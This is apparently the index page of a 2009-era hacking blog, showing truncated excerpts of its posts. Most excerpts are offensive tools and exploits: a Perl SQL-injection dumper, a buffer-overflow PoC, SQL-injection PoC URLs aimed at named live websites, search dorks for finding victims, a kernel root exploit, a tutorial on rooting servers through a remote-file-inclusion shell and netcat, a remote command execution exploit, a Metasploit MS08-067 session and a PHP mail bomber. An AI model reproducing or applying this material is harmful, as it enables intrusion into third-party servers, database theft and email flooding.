Simple SQLi Dumper (SSDp) v0.1 GUI

take from c0li.m0de.0n <? #!/usr/bin/perl # Simple SQLi Dumper (SSDp) v2.2 # Coded by Vrs-hCk # ander[at]antisecurity.org # Anti Security Team # Example: http://localhost/index.php?id=-1+union+select+1,2,3,c0li,5 use HTTP::Request; use LWP::UserAgent; my $c0de = "0x63306C69"; my $logo = "SSDp"; print "\n *************************************\n"; print " * ...

Read More

Metasploit Framework

Metasploit provides useful information to people who perform penetration testing,IDS signature development, and exploit research. This project was created toprovide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and informationon this site are provided for legal security researchand testing purposes only.Metasploit is a community project managed by Metasploit LLC.Metasploit 3.3 for WIN.32Metasploit 3.3 for U...

Read More

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

#!/usr/bin/env python########################################################################## BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2# Found By: Dr_IDE# Tested: XPSP3# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.#########################################################################buff = ("\x41" * 10000)f1 = open("BigAntPlugIn.zip","w")f1.write(buff)f1.clos...

Read More

Mambo/Joomla SQL Injection Vulneralbility

######################################################### Mambo/Joomla SQL Injection Vulneralbility #### Component : com_tupinambis #### Release : September 23, 2009 #### --------------------------------------------------####.---..-..-..-.,-..-..-..-. .---..---..---..----. ####`| |'| || || . < | || || |__ | |- \ \ `| |'| || | #### `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ####-------------------------------------------------- #########################################################[+] Author : Don Tukulesto[+] Homepage : http://www.indonesiancoder.com[+]...

Read More

Joomla Component com_fastball (league) Remote SQL Injection Vulnerability

############################################################################################################### Joomla Component com_fastball Remote SQL injection vulnerability -(league) #### Author : kaMtiEz (kamzcrew[at]gmail[dot]com) #### Homepage : http://www.indonesiancoder.com #### Date : September 23, 2009 ################################################################################################################ Hello My Name Is :### __ _____ __ ._____________### | | _______ / \_/ |_|__\_ _____/_______### | |/ /\__ \ / \ / \ __\ ||...

Read More

How to hide your IP

I know many of you hiding ip's via Socks or poxy..that's shit...sorry but if they have java they can get ur ip even if u are connected thrhough a socks.So. If u have a good connection at internet you can use this softwares:1. Local ip > AOL ( using aol 9.1 or AOL desktop 10.)To configure your ip to use AOL USA ip class you have to do go to:Open Aol 9.1 > Connection options > Advanced Broadband Settings > continue > & at Broadband u will see something " You are curently editing settings for Broadband, than click and go down to...

Read More

Happy Eid-Ul Fitr 1430

Words by words here might hurt you once even more. In case, We need to apologize to you on it.Translation (lol) : SAYA MATTHEWS MENGUCAPKAN SELAMAT HARI RAYA IDUL FITRI 1430 H MOHON MAAF LAHIR BA...

Read More

IMS SiteManager Blind SQL Injection Vuln

[o]------------------------------------------------------------------------------------[x] | Blind SQL Injection Vulnerability |[o]------------------------------------------------------------------------------------[o] | Software : IMS SiteManager | | Vendor : www.sitemanager.ims.net | | Date : 13 sept 2009 | | Author : zxvf | | Contact : paddy[at]antisecurity[dot]org |[o]------------------------------------------------------------------------------------[o][?] Google Dork "Powered by IMS SiteManager"[?] Exploit ...

Read More

ExpressLink™ SEO Blind SQL Injection Vuln

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>* Details *<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>> type :: ( menu_list.php?cid=...

Read More

BSR Webweaver Version 1.33 /Scripts access restriction bypass

[*] Date: 15/09/09[*] http://www.brswebweaver.com/downloads.html[*] Attack type : Remote[*] Patch Status : Unpatched[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.This is the reason this exploit is not called a Directory...

Read More

How to Use John the Ripper

In this config we going to use John the Ripper’s password cracker to enhance the security of your server by choosing a proper password for your system. This config assumes that you have already installed John the Ripper’s password cracker. If you haven’t installed it then please go to install Password cracker - John the Ripper now.Create test userFor testing purposes you should create a testing user “johnripper” with password “password”.adduser johnripper Image:johnripper01.jpg Crack passwordJohn the Ripper’s password cracker needs to access...

Read More

Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)

/* second verse, same as the first CVE-2009-2698 udp_sendmsg(), x86/x64 Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at NULL and finding it executed This exploit is a bit more nuanced and thoughtful ;) use ./therebel.sh for everything At this moment, when each of us must fit an arrow to his bow and enter the lists anew, to reconquer, within history and in spite of it, that which he owns already, the thin yield of his fields, the brief love of the earth, at this moment when at last a man is born, it is time...

Read More

IndexScript 3.0 SQL Injection Vuln

[o] IndexScript 3.0 SQL Injection VulnerabilitySoftware : IndexScript version 3.0Vendor : http://www.indexscript.com/Download : http://www.indexscript.com/download.phpAuthor : NoGeHome : http://antisecurity.org[o] Vulnerable filemore.php[o] Exploithttp://localhost/[path]/more.php?cat_id=[SQL][o] Proof of Concepthttp://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--[o] Dork"powered by...

Read More

Sourcode sqltools.php

code sql tools <?set_time_limit(0);error_reporting(0);$fungsi=strip_tags($_POST['fungsi']);$url=strip_tags($_POST['url']);$db=strip_tags($_POST['db']);$table=strip_tags($_POST['table']);$column=strip_tags($_POST['column']);$start=strip_tags($_POST['start']);$stop=strip_tags($_POST['stop']); $target=strip_tags($_POST['target']); ?> <title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title> <head> </head> <script> function show(id){ document.getElementById(id).style.display="block"; } function hide(id){...

Read More

Local Root via NetCat

take from BABY CORPYou will need:Quote:- Vulnerable Site in R.F.I.- Shell for R.F.I. (e.g. c99, r57 or other)- NetCat- Local Root Exploit (depending on the kernel and the version)This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF.Suppose that we have found a site with RFI vulnerability:Code:http://www.hackedsite.com/folder/index.html?page=e can run shell exploiting Remote File Inclusion, as follows:Code:http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?where...

Read More

Agoko CMS <= 0.4 remote commands execution exploit

#!/usr/bin/perlprint q~--------------------------------------------------Agoko CMS <= 0.4 remote commands execution exploitby stakermail: staker[at]hotmail[dot]it--------------------------------------------------[*] Usage -> perl [xpl.pl] [host] [path][*] Example -> perl agk.pl localhost /Agoko~; #>-----------<##>- Working -<##>-----------<########################################## staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko ## ## --------------------------------------------------...

Read More

Finding vulnerabilities in PHP scripts FULL ( with examples )

Name : Finding vulnerabilities in PHP scripts FULL ( with examples ) Author : SirGod Email : sirgod08[at]gmail[dot]com Contents : 1) About 2) Some stuff 3) Remote File Inclusion 3.0 - Basic example 3.1 - Simple example 3.2 - How to fix 4) Local File Inclusion 4.0 - Basic example 4.1 - Simple example 4.2 - How to fix 5) Local File Disclosure/Download 5.0 - Basic example 5.1 - Simple example 5.2 - How to fix 6) SQL Injection 6.0 - Basic example 6.1 - Simple example 6.2 - SQL Login Bypass 6.3 - How to fix 7) Insecure...

Read More

Ticket Support Script (ticket.php) Remote Shell Upload Vulnerability

=======================================================+++++++++++++++++++ Script information+++++++++++++++++=======================================================<<->> script :: ticket support system<<->> download :: http://www.ticketsupportscript.com/download12/TicketSupportScriptU.zip=======================================================+++++++++++++++++++++++ Exploit +++++++++++++++++++++++=======================================================<<->> Exploit :: goto here and send ticket with ur upload...

Read More

MS08-067

msf > versionFramework: 3.2-testing.5773Console : 3.2-testing.5773msf > use windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------RHOST yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapiName: Microsoft Server Service...

Read More

mail bomber

<title>Mail bomber</title><table><form method=post><input type=hidden value=ok name=ok><tr><td>Dari<td><input name=dari value="<?echo $dari; ?>"><tr><td>Kepada<td><input name=kepada value="<?echo $kepada; ?>"><tr><td>Subject<td><input name=subj value="<?echo $subj; ?>"><tr><td>Jumlah<td><input name=jumlah value="<?echo $jumlah; ?>"><tr><td>Besar email (KB)<td><input name=besar...

Read More